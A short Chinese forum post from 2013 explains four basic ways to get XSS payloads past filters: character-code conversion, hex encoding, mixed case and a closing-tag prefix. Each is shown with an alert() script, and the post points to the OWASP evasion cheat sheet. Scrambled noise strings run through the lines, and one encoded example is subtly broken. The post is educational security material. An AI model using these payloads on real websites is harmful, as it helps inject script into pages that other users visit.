四种超级基础的绕过方法。 e& f5 }' D( O) I# C1 C
1.转换为ASCII码( Q6 u- Z0 s) f
例子:原脚本为<script>alert(‘I love F4ck’)</script >
& O ?8 h8 z3 D9 q1 L8 o/ f' i; V通过转换,变成:
4 D9 g9 x9 c; h/ r+ y<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>. }8 y, c2 O0 \. Y9 ]3 b. @
1 C1 }4 ~/ }5 n' w6 A7 S2 l2.转换为HEX(十六进制)
/ h% P% v+ _3 H8 r* F& f2 t例子:原脚本为<script>alert(‘I love F4ck’)</script>/ |) |) x' c1 z' U; H2 L' K7 s
通过转换,变成:, {4 |; x8 X/ e) k8 I4 D$ B
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
; l- J; ^8 ?( |, t" k6 `1 H; l1 L
7 |0 P( u9 e3 o/ z4 f* g/ R3.转换脚本的大小写* ~4 T0 w1 h- B! l
例子:原脚本为<script>alert(‘I love F4ck’)</script>
8 m& b( v" O& A$ y( M转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>1 R' I8 ]6 ]& l, k4 W: {: w: v" ]5 _
# _+ \+ I% X) ?5 q! Y; Z
4.增加闭合标记”>" c- d: M7 D {, y, e8 b/ P- J+ `
例子:原脚本为<script>alert(‘I love F4ck’)</script>7 W2 }' M# v7 c( U
转换为:”><script>alert(‘I love F4ck’)</script>
6 Y# p: x$ o9 u+ }更详细绕过技术请参考此网页. x- k V I6 {# a
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet9 A7 |7 h% v# y( S% h9 z
. B0 p) C; d/ ?' g' J7 G2 Y0 X) J* q
转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对